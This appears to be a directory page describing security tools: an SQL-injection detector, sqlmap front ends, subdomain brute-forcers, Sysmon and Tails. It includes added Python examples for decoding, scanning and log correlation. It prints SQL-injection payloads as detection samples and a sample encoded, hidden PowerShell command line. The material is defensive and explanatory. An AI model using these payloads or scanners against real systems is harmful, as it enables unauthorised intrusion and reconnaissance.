    >>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
    {
        'payloads': [{
            'key': '',
            'score': 3.9800000190734863,
            'source': 'body: querystring_decode ',
            'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
        }, {
            'key': '',
            'score': 2.0899999141693115,
            'source': 'body: querystring_decode ',
            'value': "'SQL inject' and Password"
        }, {
            'key': '',
            'score': 2.180000066757202,
            'source': 'body: querystring_decode ',
            'value': "(SELECT @@VERSION)-- '"
        }, {
            'key': '',
            'score': 0.0,
            'source': 'body: querystring_decode ',
            'value': 'saveedit'
        }],
        'result': 1
    }
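    The 'source' field above records the decoding chain SQLChop applied before scoring (querystring_decode, b64decode, url_decode, and the byte-per-parameter arrs1[] body in the second example). The following normaliser reproduces that layer peeling; it is an added example, not SQLChop's own code. Function names and the 'bytearray_join' step label are my own, and the two sample requests are constructed from the classify examples above (the second body is rebuilt from its decoded SQL value).

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample inputs: the two requests from the classify examples above.
SAMPLE_URLPATH = ('/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEs'
                  'MiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==')
SAMPLE_SQL = ("SELECT * From Table WHERE Name='SQL inject' and Password='' "
              "and Corp='' or 1=(SELECT @@VERSION)-- '")
# The second example's body carries that SQL one byte per arrs1[] element.
SAMPLE_BODY = 'opt=saveedit&' + '&'.join('arrs1[]=%d' % ord(c) for c in SAMPLE_SQL)

_B64_RE = re.compile(r'[A-Za-z0-9+/]+={0,2}')


def looks_like_base64(value):
    # Cheap syntactic test; short tokens are skipped to limit accidental decodes.
    return len(value) >= 8 and len(value) % 4 == 0 and _B64_RE.fullmatch(value) is not None


def _is_text(data):
    # Accept only UTF-8 text without control characters (tab/newline allowed).
    try:
        text = data.decode('utf-8')
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in '\t\r\n' for ch in text)


def decode_layers(value, max_depth=8):
    """Peel base64 and URL-encoding layers off one value until nothing changes.
    Returns (decoded, chain); every pass re-tests from the start, so URL-encoded
    base64 (%3D%3D padding) is handled as well."""
    chain = []
    for _ in range(max_depth):
        if looks_like_base64(value):
            try:
                raw = base64.b64decode(value, validate=True)
            except binascii.Error:
                raw = None
            if raw is not None and _is_text(raw):
                value = raw.decode('utf-8')
                chain.append('b64decode')
                continue
        unquoted = unquote_plus(value)
        if unquoted != value:
            value = unquoted
            chain.append('url_decode')
            continue
        break
    return value, chain


def parse_query(query):
    # Split name=value&... into (name, raw_value) pairs, leaving values undecoded
    # so that decode_layers() can record each step it takes.
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, raw = part.partition('=')
            pairs.append((unquote_plus(name).strip(), raw))
    return pairs


def collapse_arrays(pairs):
    # Repeated name[] parameters whose values are all byte values (0-255) are
    # joined into one string, which is how the second example carries its SQL.
    grouped = {}
    for name, raw in pairs:
        grouped.setdefault(name, []).append(raw)
    items = []
    for name, values in grouped.items():
        if (name.endswith('[]') and len(values) > 1
                and all(v.isdigit() and int(v) < 256 for v in values)):
            items.append((name, ''.join(chr(int(v)) for v in values), ['bytearray_join']))
        else:
            items.extend((name, v, []) for v in values)
    return items


def decode_request(request):
    """Normalise {'urlpath'|'body'|'cookie'|'raw': str} into candidate payloads,
    returned as {'key', 'value', 'source'} dicts in the spirit of the classify
    output above. Scoring is left to the classifier."""
    payloads = []
    for field, text in request.items():
        if field == 'urlpath':
            pairs, steps = parse_query(urlsplit(text).query), ['querystring_decode']
        elif field == 'body':
            pairs, steps = parse_query(text), ['querystring_decode']
        elif field == 'cookie':
            pairs, steps = parse_query(text.replace(';', '&')), ['querystring_decode']
        else:  # 'raw': the whole field is one value
            pairs, steps = [('', text)], []
        for name, value, extra in collapse_arrays(pairs):
            decoded, chain = decode_layers(value)
            payloads.append({'key': name, 'value': decoded,
                             'source': field + ': ' + ' '.join(steps + extra + chain)})
    return payloads
```

Running decode_request on the two sample requests yields the same decoded values that SQLChop printed above; the base64 heuristic will occasionally decode an innocent token, which only adds a low-scoring candidate.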

    Customization

    The is_sqli API (in sqlchop.py) uses a score of 2.1 as its detection threshold; you can adjust this threshold to suit your usage scenario.
        def is_sqli(self, payload):
            ret = self.score_sqli(payload)
            return ret > 2.1  # here you can modify and test this threshold
    
        def classify(self, request, detail=False):
            ...
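    The classify() output above shows what the 'querystring_decode' source does: the repeated arrs1[] parameters are decimal character codes that, joined together, spell a full SQL statement, and that decoded string is what gets scored. The following is an added example, not SQLChop's own code, that reproduces that decoding step and wires a threshold into an is_sqli()-shaped function. The scorer is a deliberately simple keyword counter standing in for SQLChop's tokenizer-based model (an assumption, not the project's algorithm); SAMPLE_BODY is the request body from the example above.

```python
import re
from urllib.parse import parse_qsl

# The request body from the classify() example on this page (copied verbatim).
SAMPLE_BODY = "opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39"


def decode_char_array(values):
    """Return the string spelled by a list of decimal byte values, or None if it is not one."""
    try:
        codes = [int(v) for v in values]
    except ValueError:
        return None
    if not codes or any(not 0 <= c <= 255 for c in codes):
        return None
    return "".join(chr(c) for c in codes)


def candidate_payloads(body):
    """Stand-in for the 'querystring_decode' source: group repeated keys (arrs1[]),
    and when a group is a byte array emit the decoded string instead of the numbers."""
    grouped = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        grouped.setdefault(key, []).append(value)
    payloads = []
    for values in grouped.values():
        decoded = decode_char_array(values) if len(values) > 1 else None
        if decoded is not None:
            payloads.append(decoded)
        else:
            payloads.extend(values)
    return payloads


# Toy scorer (assumption, not SQLChop's model): one point per SQL-shaped feature hit.
_SQL_FEATURES = [
    re.compile(r"\b(select|union|from|where|insert|update|delete|drop)\b", re.I),
    re.compile(r"\b(and|or)\b\s*\S+\s*=", re.I),   # tautology shapes such as "or 1="
    re.compile(r"--|#|/\*"),                      # comment terminators
    re.compile(r"@@\w+|\bversion\s*\(", re.I),    # server fingerprinting
    re.compile(r"'"),                             # quote breakout
]


def score_sqli(payload):
    return float(sum(len(p.findall(payload)) for p in _SQL_FEATURES))


def is_sqli(payload, threshold=2.1):
    """Same shape as SQLChop's is_sqli: the threshold is the knob to tune."""
    return score_sqli(payload) > threshold


def classify(body, threshold=2.1):
    scored = [{"value": p, "score": score_sqli(p)} for p in candidate_payloads(body)]
    return {"payloads": scored, "result": int(any(s["score"] > threshold for s in scored))}
```

    The decode step is what makes the detection work at all: scored on the raw body, "arrs1[]=83" looks like nothing. Any detector that skips such decodings is trivially bypassed by encoding the payload one layer deeper.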


    Download SQLChop

    SQLiPy - Plugin for Burp Suite that integrates SQLMap using the SQLMap API


    SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.

    SQLMap comes with a RESTful based server that will execute SQLMap scans. This plugin can start the API for you or connect to an already running API to perform a scan.

    Requirements

    Jython 2.7 beta (needed for its json module)
    Java 1.7 or 1.8 (required by the Jython 2.7 beta)

    Usage

    SQLiPy relies on a running instance of the SQLMap API server. You can manually start the server with:
      python sqlmapapi.py -s -H <ip> -p <port>
    Or, you can use the SQLMap API tab to select the IP/Port on which to run, as well as the path to python and sqlmapapi.py on your system.

    Once the SQLMap API is running, right-click in the 'Request' sub tab of either the Target or Proxy main tab and choose 'SQLiPy Scan'.

    This will populate the SQLMap Scanner tab of the plugin with information about that request. Clicking the 'Start Scan' button will execute a scan.

    A thread in the plugin polls the API for results; if the page is vulnerable to SQL injection, the findings are added to the Scanner Results tab.



    Download SQLiPy

    SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP


    A PHP front end for the SQLMAP JSON API server (sqlmapapi.py), giving you a Web GUI that can drive nearly the full functionality of SQLMAP.

    Here are a few quick videos showing that almost all of the usual SQLMAP command-line functionality is still available through this Web GUI.

    Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005


    Demo against: Linux (CentOS), Apache, MySQL, PHP


    Requirements:
    • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
      • PHP 5.3+ is suggested; older versions were not tested, so mileage may vary
    • Python and any SQLMAP dependencies (refer to their wiki for any help there)
    • Clone this repo to your machine
      • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
      • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
      • When you want to use it, fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
      • Then navigate to the Web GUI address in your browser to begin (firefox http://127.0.0.1/sqlmap/index.php)
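    SQLiPy and this Web GUI are both front ends to the same sqlmapapi.py REST interface, and both do the same four things: create a task, start a scan with sqlmap options, poll the status until it reports "terminated", then fetch the data. The block below is an added example, not code from either project or from sqlmap, of that cycle in Python against the sqlmapapi.py endpoints (/task/new, /scan/<id>/start, /scan/<id>/status, /scan/<id>/data, /task/<id>/delete). The transport is injectable so the block runs offline against a constructed in-memory stand-in for the server; the task ID, target URL and findings that stand-in returns are invented.

```python
import json
import time
from urllib.request import Request, urlopen


def http_json(method, url, body=None):
    """Default transport: JSON over HTTP to a running sqlmapapi.py server."""
    data = None if body is None else json.dumps(body).encode()
    req = Request(url, data=data, method=method, headers={"Content-Type": "application/json"})
    with urlopen(req) as resp:
        return json.loads(resp.read().decode())


class SqlmapApiClient:
    """Drives sqlmapapi.py the way SQLiPy's polling thread does."""

    def __init__(self, base_url="http://127.0.0.1:8775", transport=http_json):
        self.base = base_url.rstrip("/")
        self.transport = transport

    def _call(self, method, path, body=None):
        reply = self.transport(method, self.base + path, body)
        if not reply.get("success", False):
            raise RuntimeError(f"sqlmapapi {method} {path} failed: {reply.get('message', reply)}")
        return reply

    def new_task(self):
        return self._call("GET", "/task/new")["taskid"]

    def delete_task(self, taskid):
        self._call("GET", f"/task/{taskid}/delete")

    def start_scan(self, taskid, options):
        # options use sqlmap's long option names, e.g. {"url": ..., "data": ..., "level": 3}
        return self._call("POST", f"/scan/{taskid}/start", options)["engineid"]

    def status(self, taskid):
        return self._call("GET", f"/scan/{taskid}/status")["status"]

    def data(self, taskid):
        return self._call("GET", f"/scan/{taskid}/data")

    def run_scan(self, options, poll_interval=2.0, sleep=time.sleep):
        """Create, start, poll to completion, collect, and always clean the task up."""
        taskid = self.new_task()
        try:
            self.start_scan(taskid, options)
            while self.status(taskid) != "terminated":
                sleep(poll_interval)
            reply = self.data(taskid)
            return reply.get("data", []), reply.get("error", [])
        finally:
            self.delete_task(taskid)


class FakeSqlmapApi:
    """Constructed in-memory stand-in for sqlmapapi.py so the client can run offline.
    Reports 'running' twice, then 'terminated'."""

    def __init__(self, findings):
        self.findings = findings
        self.polls = 0
        self.deleted = []
        self.started_with = None

    def __call__(self, method, url, body=None):
        parts = url.split("://", 1)[-1].split("/", 1)[1].split("/")
        if parts == ["task", "new"]:
            return {"success": True, "taskid": "deadbeefcafe"}
        if parts[0] == "task" and parts[2] == "delete":
            self.deleted.append(parts[1])
            return {"success": True}
        if parts[0] == "scan" and parts[2] == "start":
            self.started_with = body
            return {"success": True, "engineid": 12345}
        if parts[0] == "scan" and parts[2] == "status":
            self.polls += 1
            return {"success": True, "status": "running" if self.polls < 3 else "terminated", "returncode": None}
        if parts[0] == "scan" and parts[2] == "data":
            return {"success": True, "data": self.findings, "error": []}
        return {"success": False, "message": "unknown endpoint"}


if __name__ == "__main__":
    fake = FakeSqlmapApi(findings=[{"type": 1, "value": [{"place": "GET", "parameter": "id"}]}])
    print(SqlmapApiClient(transport=fake).run_scan({"url": "http://target.example/item.php?id=1"}, sleep=lambda s: None))
```

    The try/finally matters in practice: every task the API server keeps holds a sqlmap engine and its session files, and a GUI that forgets to delete tasks leaks them until the server is restarted. Keep the API bound to 127.0.0.1 unless you have put authentication in front of it; anything that can reach the port can launch scans from your machine.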

    Download SQLMAP-Web-GUI

    Squert - A Simple QUEry and Report Tool


    Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.

    Download  Squert

    SubBrute - Subdomain Bruteforcer

    SubBrute is a community driven project with the goal of creating the fastest, and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This design also provides a layer of anonymity, as SubBrute does not send traffic directly to the target's name servers.

    Whats new in v1.1?

    This version merges pull requests from the community; changes from JordanMilne, KxCode and rc0r are in this release. SubBrute 1.1 fixes bugs and improves accuracy and efficiency. As requested, the project is now GPLv3.

    Accuracy and better wildcard detection:
    • A new filter that can pick up geolocation-aware wildcards.
    • Misbehaving nameservers are filtered out.
    Faster:
    • More than 2,000 high-quality nameservers were added to resolvers.txt; these servers resolve multiple queries in under 1 second.
    • Nameservers are verified when they are needed. A separate thread is responsible for creating a feed of nameservers and the corresponding wildcard blacklist.
    New output:
    • -a will list all addresses associated with a subdomain.
    • -v debug output, to help developers/hackers debug subbrute.
    • -o output results to file.

    More Information

    The 'names.txt' list was created using some creative Google hacks with additions from the community. SubBrute has a feature to build your own subdomain lists by matching sub-domains with a regular expression and sorting by frequency of occurrence:
    • python subroute.py -f full.html > my_subs.txt
    names.txt contains 31298 subdomains. subs_small.txt was taken from fierce2 and contains 1896 subdomains. If you find more subdomains to add, open a bug report or pull request and I'll be happy to add them.
    No install required for Windows, just cd into the 'windows' folder:
    • subbrute.exe google.com
    Easy to install: you just need http://www.dnspython.org/ and python2.7 or python3. This tool should work under any operating system: bsd, osx, windows, linux...

    (On a side note giving a makefile root always bothers me, it would be a great way to install a backdoor...)
    Under Ubuntu/Debian all you need is:
    • sudo apt-get install python-dnspython
    On other operating systems you may have to install dnspython manually:
    http://www.dnspython.org/

    Easy to use:
    • ./subbrute.py google.com
    Tests multiple domains:
    • ./subbrute.py google.com gmail.com blogger.com
    or a newline delimited list of domains:
    • ./subbrute.py -t list.txt
    Also keep in mind that subdomains can have subdomains (example: _xmpp-server._tcp.gmail.com):
    • ./subbrute.py gmail.com > gmail.out
    • ./subbrute.py -t gmail.out


    Download SubBrute

    SubDomain Analyzer - Get detailed information of a domain


    The "SubDomain Analyzer" tool is written in Python. Its purpose is to gather full, detailed information about a selected domain. It collects that information in the following steps:
    1. Attempt a DNS zone transfer (AXFR) to obtain the zone file.
    2. Gather all information from the DNS records.
    3. Analyze the DNS records: take every IP address found in them, scan the surrounding class C range (for example 127.0.0.1/24) and keep any result that contains the domain being analyzed.
    4. Test subdomains by dictionary attack.

    The SubDomain Analyzer can keep the new addresses found in the DNS records or by the IP analysis, gathers high-quality information about the domain being analyzed and, in addition, presents a formatted report of all the data.

    Examples:
    • Analyzing example.com domain: subdomain-analyzer.py example.com
    • Analyzing example.com domain, save the records on log file by name log.txt, works with 100 threads and use by another dictionary file by name another-file.txt: subdomain-analyzer.py example.com --output log.txt --threads 100 --sub-domain-list another-file.txt
    • Analyzing example.com domain, save the records on log file by name log.txt and append a new sub-domains to sub-domains list file: subdomain-analyzer.py example.com -o log.txt --sub-domain-list
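    SubBrute's wildcard blacklist and SubDomain Analyzer's dictionary step are the same core loop: probe a few labels that cannot exist to learn what a wildcard answers with, then brute the wordlist and drop hits that only match the wildcard. The block below is an added example of that loop, written for this page and not taken from either project. It assumes DNS is provided by an injectable resolve(name) callable; the resolver, the example.test zone and the 192.0.2.0/24 addresses in it are constructed so the code runs offline, and the depth parameter shows SubBrute's point that subdomains can have subdomains.

```python
import random
import string


def make_fake_resolver(zone, wildcard_domain=None, wildcard_addrs=()):
    """Constructed stand-in for DNS (no network): a fixed zone plus an optional
    wildcard record that answers for any unknown name under wildcard_domain."""
    def resolve(name):
        if name in zone:
            return list(zone[name])
        if wildcard_domain and name.endswith("." + wildcard_domain):
            return list(wildcard_addrs)
        return []
    return resolve


def detect_wildcard(domain, resolve, probes=3, rng=random):
    """Ask for labels that cannot exist; whatever answers is the wildcard address set."""
    blacklist = set()
    for _ in range(probes):
        label = "".join(rng.choice(string.ascii_lowercase) for _ in range(16))
        blacklist.update(resolve(f"{label}.{domain}"))
    return blacklist


def brute_subdomains(domain, names, resolve, depth=1):
    """Dictionary attack with wildcard filtering; recurses into hits when depth > 1."""
    blacklist = detect_wildcard(domain, resolve)
    found = {}
    for name in names:
        fqdn = f"{name}.{domain}"
        # A hit that only returns wildcard addresses tells us nothing; drop it.
        addrs = [a for a in resolve(fqdn) if a not in blacklist]
        if addrs:
            found[fqdn] = addrs
    if depth > 1:
        for fqdn in list(found):
            found.update(brute_subdomains(fqdn, names, resolve, depth - 1))
    return found


if __name__ == "__main__":
    # Constructed zone: three real names, everything else under example.test is a wildcard.
    zone = {"www.example.test": ["192.0.2.10"],
            "mail.example.test": ["192.0.2.20"],
            "dev.www.example.test": ["192.0.2.30"]}
    resolve = make_fake_resolver(zone, "example.test", ["192.0.2.99"])
    print(brute_subdomains("example.test", ["www", "mail", "dev", "bogus"], resolve, depth=2))
```

    The exact-address filter has a known blind spot: a real host that happens to share the wildcard's address is hidden, and a wildcard that hands out different addresses per resolver location (the geolocation-aware case SubBrute 1.1 targets) needs the blacklist built from the same resolvers that answer the brute-force queries.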

    Requirements:

    Linux Installation:
    1. sudo apt-get install python-dev python-pip
    2. sudo pip install -r requirements.txt
    3. easy_install prettytable

    MacOSx Installation:
    1. Install Xcode Command Line Tools (AppStore)
    2. sudo easy_install pip, prettytable
    3. sudo pip install -r requirements.txt

    Windows Installation:
    1. Install dnspython
    2. Install gevent
    3. Install prettytable
    4. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
    5. pip install -r (Full Path To requirements.txt)
    6. easy_install prettytable

    Download SubDomain Analyzer

    SUMo - Software Update Monitor


    SUMo (Software Update Monitor) keeps your PC up-to-date & safe by using the most recent version of your favorite software !

    Unlike built-in auto update features, SUMo tells you if updates are available before you need to use your software.

    Features
    • Automatic detection of installed software
    • Detects required updates / patches for your software
    • Detects required drivers update (requires DUMo)
    • Filter / authorize Beta versions (user setting)
    • Ignore list : only tracks software YOU want to track
    • More compatibility and fewer false positives than other update monitors (according to user feedback ;-)
    • Internationalization support.

    Download SUMo

    Sysmon v2.0 - System Activity Monitor for Windows


    System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.

    Note that Sysmon does not provide analysis of the events it generates, nor does it attempt to protect or hide itself from attackers.

    Overview of Sysmon Capabilities

    Sysmon includes the following capabilities:
    • Logs process creation with full command line for both current and parent processes.
    • Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH.
    • Multiple hashes can be used at the same time.
    • Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
    • Includes a session GUID in each event to allow correlation of events in the same logon session.
    • Logs loading of drivers or DLLs with their signatures and hashes.
    • Optionally logs network connections, including each connection’s source process, IP addresses, port numbers, hostnames and port names.
    • Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
    • Automatically reloads its configuration if it is changed in the registry.
    • Rule filtering to include or exclude certain events dynamically.
    • Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.
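    The process GUID is the field that makes Sysmon data usable for correlation: Windows recycles PIDs, so a network connection (event ID 3) keyed on PID alone can be pinned on the wrong process. The block below is an added example, not Sysinternals code, that parses events in the Operational log's XML shape and joins ID 3 connections to the ID 1 process-create record sharing the same ProcessGuid. The three sample events, their GUIDs, paths and addresses are constructed for the example; the field names (ProcessGuid, ProcessId, Image, CommandLine, DestinationIp, DestinationPort) are Sysmon's own.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed GUIDs: two different processes that both received PID 4242.
GUID_FIRST = "{A1B2C3D4-0001-5555-0000-000000000001}"
GUID_SECOND = "{A1B2C3D4-0002-5555-0000-000000000002}"


def _event(event_id, fields):
    """Build one constructed event in the Sysmon Operational-log XML layout."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="Microsoft-Windows-Sysmon"/>'
            f'<EventID>{event_id}</EventID><Channel>Microsoft-Windows-Sysmon/Operational</Channel>'
            f'</System><EventData>{data}</EventData></Event>')


SAMPLE_EVENTS = [
    _event(1, {"UtcTime": "2015-06-01 10:00:00.000", "ProcessGuid": GUID_FIRST, "ProcessId": "4242",
               "Image": r"C:\Windows\System32\notepad.exe",
               "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"}),
    # notepad exits; Windows hands PID 4242 to an unrelated new process
    _event(1, {"UtcTime": "2015-06-01 10:05:00.000", "ProcessGuid": GUID_SECOND, "ProcessId": "4242",
               "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"}),
    _event(3, {"UtcTime": "2015-06-01 10:05:02.000", "ProcessGuid": GUID_SECOND, "ProcessId": "4242",
               "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "DestinationIp": "203.0.113.7", "DestinationPort": "443"}),
]


def parse_sysmon_event(xml_text):
    """Flatten one event into a dict: event_id plus every EventData/Data field by name."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    fields = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {"event_id": event_id, **fields}


def correlate_by_guid(events):
    """Attach ID 3 connections to the ID 1 record that shares their ProcessGuid."""
    processes = {}
    for ev in events:
        if ev["event_id"] == 1:
            processes[ev["ProcessGuid"]] = {"pid": int(ev["ProcessId"]), "image": ev["Image"],
                                           "command_line": ev["CommandLine"], "connections": []}
    for ev in events:
        if ev["event_id"] == 3:
            proc = processes.get(ev["ProcessGuid"])
            if proc is None:
                continue  # started before Sysmon was installed, or its create event was not collected
            proc["connections"].append((ev["DestinationIp"], int(ev["DestinationPort"])))
    return processes


def reused_pids(events):
    """PIDs seen in more than one process-create event: keying on PID alone would merge them."""
    seen = {}
    for ev in events:
        if ev["event_id"] == 1:
            seen.setdefault(int(ev["ProcessId"]), set()).add(ev["ProcessGuid"])
    return {pid for pid, guids in seen.items() if len(guids) > 1}


if __name__ == "__main__":
    parsed = [parse_sysmon_event(x) for x in SAMPLE_EVENTS]
    for guid, proc in correlate_by_guid(parsed).items():
        print(guid, proc["pid"], proc["image"], proc["connections"])
    print("reused PIDs:", reused_pids(parsed))
```

    Joined this way, the outbound 443 connection lands on the encoded PowerShell command line and not on notepad, which is the answer an analyst actually needs. The same join works on the parent side through ParentProcessGuid to rebuild the process tree.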

    Usage

    Sysmon uses simple command-line options to install and uninstall itself, and to check and modify its configuration:

    Sysinternals Sysmon v2.00 - System activity monitor

    Copyright (C) 2014-2015 Mark Russinovich and Thomas Garnier
    Sysinternals - www.sysinternals.com


    Usage:
    Install:    Sysmon.exe -i <configfile> [-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)] [-l (<process,...>)]
    Configure:  Sysmon.exe -c <configfile> [--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)] [-l (<process,...>)]]
    Uninstall:  Sysmon.exe -u

    -c   Update the configuration of an installed Sysmon driver, or dump the current configuration if no other argument is provided. Optionally takes a configuration file.
    -h   Specify the hash algorithms used for image identification (default is SHA1). Multiple algorithms can be used at the same time. Configuration entry: Hashing.
    -i   Install service and driver. Optionally takes a configuration file.
    -l   Log loading of modules. Optionally takes a list of processes to track. Configuration entry: ImageLoading.
    -m   Install the event manifest (done on service install as well).
    -n   Log network connections. Optionally takes a list of processes to track. Configuration entry: Network.
    -u   Uninstall service and driver.

    The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.

    On Vista and higher, events are stored in "Applications and Services Logs/Microsoft/Windows/Sysmon/Operational". On older systems, events are written to the System event log.

    If you need more information on configuration files, use the '-? config' command. More examples are available on the Sysinternals website.

    Specify -accepteula to automatically accept the EULA on installation, otherwise you will be interactively prompted to accept it.

    Neither install nor uninstall requires a reboot.

    Examples

    Install with default settings (process images hashed with sha1 and no network monitoring)
    sysmon -accepteula -i
    Install with md5 and sha256 hashing of process created and monitoring network connections
    sysmon -accepteula -i -h md5,sha256 -n
    Install Sysmon with a configuration file (as described below)
    sysmon -accepteula -i c:\windows\config.xml
    Uninstall
    sysmon -u
    Dump the current configuration
    sysmon -c
    Change the configuration to use all hashes, no network monitoring and monitoring of DLLs in Lsass
    sysmon -c -h * -l lsass.exe
    Change the configuration of sysmon with a configuration file (as described below)
    sysmon -c c:\windows\config.xml
    Change the configuration to default settings
    sysmon -c --


    Download Sysmon v2.0

    Tails 1.3 - The Amnesic Incognito Live System


    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.   

    Tails, The Amnesic Incognito Live System, version 1.3, is out.
    This release fixes numerous security issues and all users must upgrade as soon as possible.

    New features
    • Electrum is an easy to use bitcoin wallet. You can use the Bitcoin Client persistence feature to store your Electrum configuration and wallet.
    • The Tor Browser has additional operating system and data security. This security restricts reads and writes to a limited number of folders. Learn how to manipulate files with the new Tor Browser.
    • The obfs4 pluggable transport is now available to connect to Tor bridges. Pluggable transports transform the Tor traffic between the client and the bridge to help disguise Tor traffic from censors.
    • Keyringer lets you manage and share secrets using OpenPGP and Git from the command line.

    Upgrades and changes
    • The Mac and Linux manual installation processes no longer require the isohybrid command. Removing the isohybrid command simplifies the installation.
    • The tap-to-click and two-finger scrolling trackpad settings are now enabled by default. This should be more intuitive for Mac users.
